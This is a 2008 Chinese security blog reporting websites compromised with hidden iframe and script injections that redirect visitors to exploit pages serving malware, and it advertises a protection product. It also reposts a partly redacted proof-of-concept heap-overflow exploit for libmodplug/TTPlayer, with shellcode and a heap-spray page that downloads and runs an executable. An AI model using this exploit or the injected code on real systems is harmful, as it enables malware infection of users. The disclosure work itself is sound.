知道安全

发布日期：2008-3-30

最后更新日期：2008-3-30   23：01（GMT）

来自：知道安全

MAL_URL：hXXp://download.it168.com/08/0801/86013/86013_3.shtml

今晚发现365门神拦截了IT168的软件下载页面，经过分析发现并非误报，IT168的软件下载页面被插入了恶意代码。

详细情况：

[website]download.it168.com/08/0801/86013/86013_3.shtml
                [script]www4.it168.com/bottom/newfoot.js
                             [iframe]software.it168.com/downloadbottom/downloadbottom3.htm
                                           [iframe]www.cnsw.org/blank.htm
                                                         [iframe]k.j8j8.biz/103/

about  Mass iframe injection(k.j8j8.biz/103):

[website]k.j8j8.biz/103
        [ms06014]k.j8j8.biz/103/14.htm
                [virus]http://vvv.123sky.biz/103/103.exe
        [REAL]http://k.j8j8.biz/103/r.htm
                [virus]http://vvv.123sky.biz/103/103.exe
        [联众]http://k.j8j8.biz/103/lz.htm
                [virus]http://vvv.123sky.biz/103/103.exe

推荐的应对方法：在你的电脑里将k.j8j8.biz，vvv.123sky.biz添加到HOSTS文件进行屏蔽。安装365门神（WESEC）软件，对IE浏览器在打开网站的时候进行保护，拦截来自网络带有恶意代码的网页攻击。使用帮助和下载：http://www.scanw.com/

Popularity: 47% [?]

发布日期：2008-3-30

最后更新日期：2008-3-30   20：37（GMT）

来自：知道安全     来自互联网的威胁每天都在变着花样，想尽办法对你的电脑耍流氓。很多黑客就盯上了资源共享这一块大蛋糕，因为每一分钟都会有很多人通过搜索，找到资源的下载地址。而黑客们，就伪造那些资源，用病毒捆绑那些资源文件，想尽一切办法伪装，让你在下载资源运行他们的恶意程序。 当然。我们有杀毒软件。大家现在学会了对下载以后的资源进行扫描病毒，而且讯雷本身也会自动对下载好的资源文件进行扫描。 这些应对方法有效的阻挡了一部分黑客。

但是。还有一些黑客并不是在资源文件里直接放病毒。他们为了躲避查杀，用了更聪明的方法：

在资源下载的页面进行挂马；

在下载的资源里放一个网页文件，诱导用户打开，然后跳转到网马页面。

在资源下载页面挂马，这么做是因为讯雷在打开资源下载页的时候，也会调用到资源原本所在的页面，所以即使是在讯雷搜索，找到的资源里也是危机四伏，当你要下载你想要的资源，打开以后，连接到有挂马的资源页，你就等于一脚踩在地雷上了。

现在讯雷里连接一些原始资源页的事情比较少了，在以前，我暴光了不少的恶意连接，都是在讯雷的原始资源页里。讯雷也许是注意到这个安全问题，所以做了一些应对措施。

那现在黑客们怎么办呢？

他们又想出了一个办法：

将一个自动跳转到恶意页面的网页文件放进压缩包里。然后将其网页文件命名为第一集播放地址，引诱用户打开。

这样一来就解决了几个老大难问题：

网页文件不包含任何恶意代码，它只写了跳转到其他网页的命令，所以完全躲过杀软查杀。

不需要再直接放病毒进资源文件里，减少体积，增加下载效率。也不需要对病毒程序进行免杀，伪装处理等。

现在黑客只需要用户打开所谓第一集播放地址的网页，然后就自动跳转到黑客原先准备好的网马地址，执行网马，让网马来使用户运行病毒程序而达到目的。

那些网页代码一般是这样的：

<html><head><title>正在转入地址</title>
<meta http-equiv=content-type content=”text/html; charset=gb2312″>
<meta http-equiv=”refresh” content=”0; url=http://vip.44box.com/”>
</head>
<body><p>.</p><p>.</p>
<h1>正在转入地址</h1>
</body></html>

而黑客们还会用一些手段来引诱用户下载该资源。是什么样的诱惑可以让用户冒着危险去下载并且运行呢？肯定是很黄很暴力的了：

这种情况下。建议广大的男同胞们使用365门神。

安装门神以后，在打开那个自动跳转的网页文件，在跳转的时候会因为访问恶意地址而遭到拦截，从而保护用户不会遭遇网马的威胁。

用365门神可以弥补杀毒软件在这一方面的不足，并且不会和杀毒软件造成冲突，时刻保护你浏览很黄很暴力的地方。

下载地址：

http://ishare.iask.sina.com.cn/cgi-bin/fileid.cgi?fileid=3408858&all=y

Popularity: 50% [?]

来自：知道安全

国家体育总局航空无线电模型运动管理中心（hXXp://www.carms.org.cn/）：

首页被插入：
 <iFrame src=HXXp://www.sHijiediyi.net/one/Hao8.Htm?015 width=1 name=’3806′ height=1></iframe>

Popularity: 42% [?]

转自：http://hi.baidu.com/dummy24/blog/item/d4167e1fd28cc7f1e1fe0bc7.html

上个月看的洞，昨天晚上又重新翻看了一下这个洞，终于看到了成功利用的可能性。
远程和本地攻击最后都可以，本地攻击成功比较低一些，头疼。
详细的利用代码不贴了，详细可以看看 libmod 的源码

下面是远程部分 poc, 2个关键 DWORD 值隐藏了.

代码:

/*
libmodplug v0.8
   load_med.cpp
   BOOL CSoundFile::ReadMed(const BYTE *lpStream, DWORD dwMemLength)
     line 670: memcpy(m_lpszSongComments, lpStream+annotxt, annolen);

千千静听使用的是 libmod 来进行 mod 类文件格式的处理, 此库在 ReadMed 函数中，没有检查
文件描述的长度，如果传递一个恶意构造的值，将导致堆溢出。
现在采用libmod 软件很多，都应该存在此问题。

*/

/*
   author: dummy
   e-mail: dummyz@126.com

   date: 2008/02/25
*/

#include <windows.h>
#include <stdio.h>

#pragma pack(1)

typedef struct tagMEDMODULEHEADER
{
   DWORD id;     // MMD1-MMD3
   DWORD modlen;   // Size of file
   DWORD song;     // Position in file for this song
   WORD psecnum;
   WORD pseq;
   DWORD blockarr;   // Position in file for blocks
   DWORD mmdflags;
   DWORD smplarr;   // Position in file for samples
   DWORD reserved;
   DWORD expdata;   // Absolute offset in file for ExpData (0 if not present)
   DWORD reserved2;
   WORD pstate;
   WORD pblock;
   WORD pline;
   WORD pseqnum;
   WORD actplayline;
   BYTE counter;
   BYTE extra_songs;   // # of songs - 1
} MEDMODULEHEADER;

typedef struct tagMMD0SAMPLE
{
   WORD rep, replen;
   BYTE midich;
   BYTE midipreset;
   BYTE svol;
   signed char strans;
} MMD0SAMPLE;

// MMD0/MMD1 song header
typedef struct tagMMD0SONGHEADER
{
   MMD0SAMPLE sample[63];
   WORD numblocks;     // # of blocks
   WORD songlen;     // # of entries used in playseq
   BYTE playseq[256];   // Play sequence
   WORD deftempo;     // BPM tempo
   signed char playtransp;   // Play transpose
   BYTE flags;       // 0x10: Hex Volumes | 0x20: ST/NT/PT Slides | 0x40: 8 Channels song
   BYTE flags2;     // [b4-b0]+1: Tempo LPB, 0x20: tempo mode, 0x80: mix_conv=on
   BYTE tempo2;     // tempo TPL
   BYTE trkvol[16];   // track volumes
   BYTE mastervol;     // master volume
   BYTE numsamples;   // # of samples (max=63)
} MMD0SONGHEADER;

typedef struct tagMMD0EXP
{
   DWORD nextmod;       // File offset of next Hdr
   DWORD exp_smp;       // Pointer to extra instrument data
   WORD s_ext_entries;     // Number of extra instrument entries
   WORD s_ext_entrsz;     // Size of extra instrument data
   DWORD annotxt;
   DWORD annolen;
   DWORD iinfo;       // Instrument names
   WORD i_ext_entries;  
   WORD i_ext_entrsz;
   DWORD jumpmask;
   DWORD rgbtable;
   BYTE channelsplit[4];   // Only used if 8ch_conv (extra channel for every nonzero entry)
   DWORD n_info;
   DWORD songname;       // Song name
   DWORD songnamelen;
   DWORD dumps;
   DWORD mmdinfo;
   DWORD mmdrexx;
   DWORD mmdcmd3x;
   DWORD trackinfo_ofs;   // ptr to song->numtracks ptrs to tag lists
   DWORD effectinfo_ofs;   // ptr to group ptrs
   DWORD tag_end;
} MMD0EXP;

#pragma pack()

// Byte swapping functions from the GNU C Library and libsdl

/* Swap bytes in 16 bit value.   */
#ifdef __GNUC__
# define bswap_16(x) \
     (__extension__                     \
      ({ unsigned short int __bsx = (x);                 \
         ((((__bsx) >> 8) & 0xff) | (((__bsx) & 0xff) << 8)); }))
#else
static __inline unsigned short int
bswap_16 (unsigned short int __bsx)
{
   return ((((__bsx) >> 8) & 0xff) | (((__bsx) & 0xff) << 8));
}
#endif

/* Swap bytes in 32 bit value.   */
#ifdef __GNUC__
# define bswap_32(x) \
     (__extension__                     \
      ({ unsigned int __bsx = (x);                 \
         ((((__bsx) & 0xff000000) >> 24) | (((__bsx) & 0x00ff0000) >>   8) |     \
    (((__bsx) & 0x0000ff00) <<   8) | (((__bsx) & 0x000000ff) << 24)); }))
#else
static __inline unsigned int
bswap_32 (unsigned int __bsx)
{
   return ((((__bsx) & 0xff000000) >> 24) | (((__bsx) & 0x00ff0000) >>   8) |
     (((__bsx) & 0x0000ff00) <<   8) | (((__bsx) & 0x000000ff) << 24));
}
#endif

#ifdef WORDS_BIGENDIAN
#define bswapLE16(X) bswap_16(X)
#define bswapLE32(X) bswap_32(X)
#define bswapBE16(X) (X)
#define bswapBE32(X) (X)
#else
#define bswapLE16(X) (X)
#define bswapLE32(X) (X)
#define bswapBE16(X) bswap_16(X)
#define bswapBE32(X) bswap_32(X)
#endif

#define FILE_SIZE_   0x30000
// 远程攻击
#if 0
// 成功率很低
#define NOP_     "\"%u090aऊ\""
#define HEAP_ADDR_   码
#else
// 成功率很高
#define NOP_     "\"邐邐\""
#define HEAP_ADDR_   码

#endif

const unsigned char shellcode[174] =
{
   // 必须是偶数大小
   0xE8, 0x00, 0x00, 0x00, 0x00, 0x6A, 0x03, 0xEB, 0x21, 0x7E, 0xD8, 0xE2, 0x73, 0x98, 0xFE, 0x8A,
   0x0E, 0x8E, 0x4E, 0x0E, 0xEC, 0x55, 0x52, 0x4C, 0x4D, 0x4F, 0x4E, 0x00, 0x00, 0x36, 0x1A, 0x2F,
   0x70, 0x63, 0x3A, 0x5C, 0x63, 0x2E, 0x65, 0x78, 0x65, 0x00, 0x59, 0x5F, 0xAF, 0x67, 0x64, 0xA1,
   0x30, 0x00, 0x8B, 0x40, 0x0C, 0x8B, 0x70, 0x1C, 0xAD, 0x8B, 0x68, 0x08, 0x51, 0x8B, 0x75, 0x3C,
   0x8B, 0x74, 0x2E, 0x78, 0x03, 0xF5, 0x56, 0x8B, 0x76, 0x20, 0x03, 0xF5, 0x33, 0xC9, 0x49, 0x41,
   0xAD, 0x03, 0xC5, 0x33, 0xDB, 0x0F, 0xBE, 0x10, 0x38, 0xF2, 0x74, 0x08, 0xC1, 0xCB, 0x0D, 0x03,
   0xDA, 0x40, 0xEB, 0xF1, 0x3B, 0x1F, 0x75, 0xE7, 0x5E, 0x8B, 0x5E, 0x24, 0x03, 0xDD, 0x66, 0x8B,
   0x0C, 0x4B, 0x8B, 0x5E, 0x1C, 0x03, 0xDD, 0x8B, 0x04, 0x8B, 0x03, 0xC5, 0xAB, 0x59, 0xE2, 0xBC,
   0x8B, 0x0F, 0x80, 0xF9, 0x63, 0x74, 0x0A, 0x57, 0xFF, 0xD0, 0x95, 0xAF, 0xAF, 0x6A, 0x01, 0xEB,
   0xAC, 0x52, 0x52, 0x57, 0x8D, 0x8F, 0xDB, 0x10, 0x40, 0x00, 0x81, 0xE9, 0x4E, 0x10, 0x40, 0x00,
   0x51, 0x52, 0xFF, 0xD0, 0x6A, 0x01, 0x57, 0xFF, 0x57, 0xEC, 0xFF, 0x57, 0xE8, 0x90
};

const char* script1 = \
   "<html><body><object id=\"ttp\" classid=\"clsid:89AE5F82-410A-4040-9387-68D1144EFD03\"></object><script>"
   "var sc=unescape(\"";
const char* script2 = \
   "\");"
   "fb=unescape(" NOP_ ");"
   "while(fb.length<0x30000)fb+=fb;"
   "m=new Array();"
   "for(x=0;x<400;x++)m[x]=sc+fb+sc;"
   "setTimeout(\'ttp.URL=\"";
const char* script3 = \
   "\";ttp.controls.play();\', 3);</script>"
   "</body>"
   "</html>";

void make_med_file(const char* path)
{
   MEDMODULEHEADER mmh;
   MMD0SONGHEADER msh;
   MMD0EXP mex;
   FILE* file;
   long p;

   memset(&mmh, 0, sizeof (mmh));
   memset(&msh, 0, sizeof (msh));
   memset(&mex, 0, sizeof (mex));
  
   p = 0;

   mmh.id = 0x30444D4D; // version = '0'

   p +=   sizeof (MEDMODULEHEADER);
   mmh.song = bswapBE32(p);

   p += sizeof (MMD0SONGHEADER);
   mmh.expdata = bswapBE32(p);
  
   p += sizeof (MMD0EXP);
   mex.annolen = bswapBE32(-1);
   mex.annotxt = bswapBE32(p);
  
   file = fopen(path, "wb+");
   if ( file == NULL )
   {
     printf("create file failed!\n");
     exit(0);
   }
   else
   {
     fwrite(&mmh, 1, sizeof (mmh), file);
     fwrite(&msh, 1, sizeof (msh), file);
     fwrite(&mex, 1, sizeof (mex), file);
    
     while ( ftell(file) < FILE_SIZE_ )
     {
       fwrite(HEAP_ADDR_, 1, 4, file);
     }
    
     fclose(file);
     printf("successed!\n");
   }
}

void make_htlm_file(const char* htmlpath, const char* s3mpath, const char* url)
{
   FILE *file = fopen(htmlpath, "w+");
   if ( file == NULL )
   {
     printf("create '%s' failed!\n", htmlpath);
     exit(0);
   }

   fprintf(file, "%s", script1);
   for ( unsigned i = 0; i < sizeof (shellcode); i += 2 )
     fprintf(file, "%%u%02X%02X" , shellcode[i + 1], shellcode[i]);
  
   const unsigned l = strlen(url);
   for ( unsigned j = 0; j < l; j += 2 )
     fprintf(file, "%%u%02X%02X" , url[j + 1], url[j]);
  
   fprintf(file, "%s%s%s", script2, s3mpath, script3);
   fclose(file);
  
   printf("make '%s' successed!\n", htmlpath);
}

int main(int argc, char* argv[])
{
   printf("ttplayer stack exp poc by dummyz@126.com\n");
   if ( argc <= 1 )
   {
     printf("need argv!(ex: %s http://xxx.xxx/xx.exe\n", argv[0]);
     return -1;
   }
  
   printf("+ make_med_file...\n");
   make_med_file("c:\\shit.s3m");

   printf("+ make_htlm_file...\n");
   make_htlm_file("poc.html", "c://shit.s3m", argv[1]);

   printf("done.\n");

   return 0;
}

Popularity: 45% [?]

来自：知道安全 中国51在线免费论文资源下载网（http://www.51lun-wen.cn/）

被插入恶意代码：

hXXp://x1.315666.net/s1.html?yu

Popularity: 41% [?]

中国新通信（技术）网（http://www.chinadata.com.cn/）首页被插入：

<iframe src=http://www.751down.cn/ad.htm height=0 width=0></iframe>

Popularity: 42% [?]

上海海港经济开发区（hXXp://www.shseaport.com/）首页被插入：

<iframe src=http://daxin5657.host.shuangxian.com/com/cuteqq.htm width=0 height=0></iframe>

第一秀（hXXp://www.dyshow.net）使用ITSUN统计而被插入恶意代码

Popularity: 45% [?]

发布日期：2008-3-27

最后更新日期：2008-3-27   14：30（GMT）

 来自：知道安全 

Mal_URL : hxxp://war.163.com/07/1224/12/40FPVM3K00011232.html  情况：网易的军事频道页面由于调用了环球军事网站而导致被插入恶意代码。访客在访问军事频道的过程中会间接浏览了环球军事网站而导致执行了插入在环球军事网站里的恶意代码。

详细：网易的页面（hxxp://war.163.com/07/1224/12/40FPVM3K00011232.html）调用了环球军事网（hxxp://bbs.globbs.com/viewthread.php?tid=151391&extra=page%3D1）环球军事网的页面里被插入恶意代码：

<iframe height=”1″ width=”1″ src=”hxxp://wb.shijiediyi.net/one/hao2.htm?00333″ mce_src=”http://wb.shijiediyi.net/one/hao2.htm?00333″>

********************************************************************

hxxp://war.163.com/07/1224/12/40FPVM3K00011232.html
[iframe]hxxp://bbs.globbs.com/viewthread.php?tid=151391&extra=page%3D1
       [iframe]hxxp://wb.shijiediyi.net/one/hao2.htm?00333
               [iframe]hxxp://wb.shijiediyi.net/wm/new.htm
                       [ms06014]hxxp://web.shijiediyi.net/wm/014s.js
                               [virus]hxxp://xia.qisihuisheng.net/mm/014s.exe
                       [REAL]hxxp://web.shijiediyi.net/wm/rll.js
                               [virus]hxxp://xia.qisihuisheng.net/mm/rll.exe
                       [联众]hxxp://web.shijiediyi.net/wm/og.htm
                               [virus]hxxp://xia.qisihuisheng.net/mm/ogame.exe
                       [百度]hxxp://xia.qisihuisheng.net/mm/new.cab *******************************************************************

推荐的应对方法：在你的电脑里将xia.qisihuisheng.net，web.shijiediyi.net，wb.shijiediyi.net添加到HOSTS文件进行屏蔽。安装365门神（WESEC）软件，对IE浏览器在打开网站的时候进行保护，拦截来自网络带有恶意代码的网页攻击。使用帮助和下载：http://www.scanw.com/

Popularity: 36% [?]

来自：知道安全

大连手机网（dlmobile.net）首页被替换为恶意代码连接：<iframe src=http://www.jtxp.net/mm/p357.htm width=0 height=0></iframe><script src=http://1.hao929.cn/l.js></script>金册企业管理咨询（中国）有限公司（http://www.kingce.com/）首页被插入恶意代码：

<SCRIPT language=javascript>

if(document.cookie.indexOf(’hello’)==-1){var expires=new Date();expires.setTime(expires.getTime() +24*60*60*1000);document.cookie=’hello=Yes;path=/;expires=’+expires.toGMTString();document.write(unescape(”%3C%68%74%6D%6C%3E%3C%69%66%72%61%6D%65%20%77%69%64%74%68%3D%27%30%27%20%68%65%69%67%68%74%3D%27%30%27%20%73%72%63%3D%27%68%74%74%70%3A%2F%2F%77%77%77%2E%38%35%31%37%33%33%2E%63%6E%2F%68%74%6D%2F%67%6F%6C%64%69%70%2E%68%74%6D%3F%30%38%34%27%3E%3C%2F%69%66%72%61%6D%65%3E%3C%2F%68%74%6D%6C%3E”));}

</SCRIPT>

<iframe src=http://www.jiaruixuan.cn/wm.htm width=1 height=1></iframe>

Popularity: 35% [?]

 来自：知道安全

美利山（hxxp://americamount.com.cn/）首页被插入：

hxxp://www.t-tou.cn/klyb.html

华侨城（hxxp://www.octbj.com/）首页被插入：

 hxxp://www.t-tou.cn/klyb.html

Popularity: 34% [?]